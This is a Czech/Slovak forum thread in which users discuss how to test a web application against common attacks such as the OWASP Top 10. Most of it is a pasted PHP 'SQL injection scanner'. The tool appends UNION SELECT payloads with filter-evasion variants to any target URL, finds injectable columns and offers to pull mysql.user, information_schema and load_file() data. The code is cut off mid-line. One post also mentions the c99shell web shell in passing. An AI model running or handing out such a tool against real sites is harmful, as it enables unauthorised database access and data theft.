Autor Zpráva
Slash
Profil *
Chcel by som sa spýtať či existuje nejaký (aspoň čiastočný) návod alebo nástroj na otestovanie bezpečnosti web aplikácie. Samozrejme mi je jasné že to nespravím ako profesionálna firma ktorá za to berie 1000 eur a viac ale skrátka nejaký jednoduchý návod. Aby bolo jasné o čo mi ide -

* A1 – Injection
* A2 – Cross Site Scripting (XSS)
* A3 – Broken Authentication and Session Management
* A4 – Insecure Direct Object References
* A5 – Cross Site Request Forgery (CSRF)
* A6 – Security Misconfiguration
* A7 – Insecure Cryptographic Storage
* A8 – Failure to Restrict URL Access
* A9 – Insufficient Transport Layer Protection
* A10 – Unvalidated Redirects and Forwards


Samozrejme som na nete našiel vela návodov ako sa robí napríklad xss ale mne ide skôr o to či neviete o nejakom návode ako otestovať odolnosť web stránky/aplikácie proti najčastejším hackerským útokom … dakujem
zedna
Profil
Taky by se mi něco takového hodilo, protože c99shell neukáže úplně všechno
zedna
Profil
ale možná ti pomůže http://www.acunetix.com/vulnerability-scanner/links.htm je to program co si můžeš stáhnout(trial) a otestovat si web. jinak je jasný, že pokud umíš tyto hacky, tak se proti nim můžeš i bránit
Ricco
Profil *
Ano to mi je jasne ze pokial všetky tieto hacky ovladam sa možem aj účinne brániť, ale problém je ten že niesom hacker ... :) a je mi jasné že testovať to budem musieť aj ručne.

Ďakujem za linky pozriem sa na to
zedna
Profil
tak treba tady mas test na SQL injection

<?php

@set_time_limit(0);
/*
F-Security - Sql InyeXion Scanner v1
Desarrollado por Knet
Adminitradores - www.remoteexecution.org
Contacto:
Keynet.security@Gmail.com [ Mail ]
Keynet.security@Hotmail.com [ Msn ]
*/
$web=$_POST['web'];
$end=$_POST['end'];
$scann=$_POST['scann'];
$union=$_POST['union'];
$max=$_POST['max'];
$from_format=$_POST['from'];
$MySqluser=$_POST['MySqluser'];
$InforMationSchema=$_POST['InforMationSchema'];
$TblBrt=$_POST['TblBrt'];
$TblFormat=$_POST['TblFormat'];
$ColBrt=$_POST['ColBrt'];
$ColFormat=$_POST['ColFormat'];
$LdFl=$_POST['LdFl'];
$string='err0r';
$union_array=array(
'-1+UNION+SELECT+',
'-1\'+UNION+SELECT+',
'-1+UNION+ALL+SELECT+',
'-1\'+UNION+ALL+SELECT+',
'-1/**/UNION/**/SELECT/**/',
'-1\'/**/UNION/**/SELECT/**/',
'-1/**/UNION/**/ALL/**/SELECT/**/',
'-1\'/**/UNION/**/ALL/**/SELECT/**/',
'1+UNION+SELECT+',
'1\'+UNION+SELECT+',
'1+UNION+ALL+SELECT+',
'1\'+UNION+ALL+SELECT+',
'1/**/UNION/**/SELECT/**/',
'1\'/**/UNION/**/SELECT/**/',
'1/**/UNION/**/ALL/**/SELECT/**/',
'1\'/**/UNION/**/ALL/**/SELECT/**/'
);
$count_union_array=count($union_array) + 1;
$from_array=array(
'+from+',
'/**/from/**/',
'+FROM+',
'/**/FROM/**/',
'%20from%20',
'%20FROM%20'
);
$count_from_array=count($from_array) + 1;
$from=$from_array[$from_format];
$iny_1=$union_array[$union];
$iny_2='0x'.bin2hex($string);
$iny_3='0x'.bin2hex($string);
if($max<3 || $max=="" || !is_numeric($max))
{
$max=3;
}
?>
<form action="" method="POST">
<table>
<tr>
<td><h1>Sql InyeXion Scanner F-Security Team</h1></td>
</tr>
<tr>
<td>Web:
<input id="boton" type="text" name="web" value="
<?php if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?>
" size="60">
</td>
<td>Union*:
<SELECT name="union" size="1" id="boton">
<?php
for($union_for=0;$union_for<=$count_union_array;$union_for++)
{
if($union_array[$union_for]!="")
{
echo '<OPTION VALUE="'.$union_for.'">'.$union_array[$union_for].'</OPTION>'."\n";
}
}
?>
</SELECT>
<td>Max columns:
<SELECT name="max" size="1" id="boton">
<?php
for($max_a=1;$max_a<=255;$max_a++)
{
echo '<OPTION VALUE="'.$max_a.'">'.$max_a.'</OPTION>'."\n";
}
?>
</SELECT>
</td>
<td>eND:
<input id="boton" type="text" name="end" value="
<?php if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10">
</td>
</tr>
</table>
<table>
<tr>
<td>From* Format:
<td>
<SELECT name="from" size="1" id="boton">
<?php
for($from_for=0;$from_for<=$count_from_array;$from_for++)
{
if($from_array[$from_for]!="")
{
echo '<OPTION VALUE="'.$from_for.'">'.$from_array[$from_for].'</OPTION>'."\n";
}
}
?>
</SELECT>
</td>
</tr>
</table>
<table>
<tr>
<td>Test mysql.user:</td>
<td>Yes</td>
<td><input type="radio" name="MySqluser" value="S" checked></td>
<td>No</td>
<td><input type="radio" name="MySqluser" value="N"></td>
</tr>
<tr>
<td>Test information_schema:</td>
<td>Yes</td>
<td><input name="InforMationSchema" type="radio" value="S" checked="checked"></td>
<td>No</td>
<td><input type="radio" name="InforMationSchema" value="N"></td>
</tr>
<tr>
<td>Tables BruteForce:</td>
<td>Yes</td>
<td><input name="TblBrt" type="radio" value="S" checked="checked"></td>
<td>No</td>
<td><input type="radio" name="TblBrt" value="N"></td>
<td>|</td>
<td>tablename</td>
<td><input type="radio" name="TblFormat" value="1" checked></td>
<td>|</td>
<td>TableName</td>
<td><input type="radio" name="TblFormat" value="2"></td>
<td>|</td>
<td>TABLENAME</td>
<td><input type="radio" name="TblFormat" value="3"></td>
</tr>
<tr>
<td>Columns BruteForce:</td>
<td>Yes</td>
<td><input name="ColBrt" type="radio" value="S" checked="checked"></td>
<td>No</td>
<td><input type="radio" name="ColBrt" value="N"></td>
<td>|</td>
<td>columname</td>
<td><input type="radio" name="ColFormat" value="1" checked></td>
<td>|</td>
<td>ColumName</td>
<td><input type="radio" name="ColFormat" value="2"></td>
<td>|</td>
<td>COLUMNAME</td>
<td><input type="radio" name="ColFormat" value="3"></td>
</tr>
<tr>
<td>Test load_file():</td>
<td>Yes</td>
<td><input type="radio" name="LdFl" value="S" checked></td>
<td>No</td>
<td><input type="radio" name="LdFl" value="N"></td>
</tr>
<tr>
<td><input id="boton" type="submit" name="scann" value="Scann"></td>
</tr>
</table>
<table>
<tr>
<td>
<?php
if(isset($scann) && $web!="")
{
for($a_for=1;$a_for<=$max;$a_for++)
{
$iny_2=$iny_2.'2d'.bin2hex($a_for);
$iny=$web.$iny_1.$iny_2;
$webmas = $iny;
$contenido = @file_get_contents($webmas.$end);
$alert = strpos($contenido,$string);
if(!$alert)
{
$iny_2=$iny_2.','.$iny_3;
$iny_vuln .= $a_for.',';
}
else
{
$f_num=$a_for;
$web_final=$web.$iny_1.$iny_vuln.$f_num;
//echo $webmas;
echo '[+] Bug Found in: '.$a_for."<br>".'<a href="'.htmlentities($web_final.$end).
'" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>";
echo 'vuln in num/s: |';
/*********************************SALVANDO********* ******************************/
$_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for.
"<br>".'<a href="'.htmlentities($web_final.$end).
'" TARGET=BLANK>'.htmlentities($web_final.$end).'</a>'."<br>".'vuln in num/s: |';
/*********************************SALVANDO********* ******************************/
$vulns=array();
for($search_for=1;$search_for<=$a_for;$search_for++)
{
if(strpos($contenido,$string.'-'.$search_for))
{
echo $search_for.'|';
/*********************************SALVANDO********* *************
*****************/
$_SESSION['all_saveds'] .= $search_for.'|';
/*********************************SALVANDO********* *************
*****************/
array_push($vulns,$search_for);
}
}
/*********************************SALVANDO********* ******************************/
$_SESSION['all_saveds'] .= "<br>".'---------------------------------------------'.
'------------------------------------------------'."<br>";
/*********************************SALVANDO********* ******************************/
echo "<br>".'---------------------------------------------'.
'------------------------------------------------'."<br>";
$a_for=$max;
define('vuln','yes');
}
if(!$alert && $a_for==$max)
{
echo 'no vuln in 1->'.$max."\n";
}
$contenido='';
}
}
/* FINAL SIMPLE SCANN */
if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S")
{
$from_mysql_user
Darker
Profil
zedna:
Pokud je kód někde ke stažení, dávej radši odkaz.

Slash:
Našel jsem tady nějaký seznam scanerů.
zedna
Profil
on nebyl ke stažení, byl právě takhle online po přihlášením do fóra
Darker
Profil
zedna:
Useklo ti to konec. Pro příště.

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: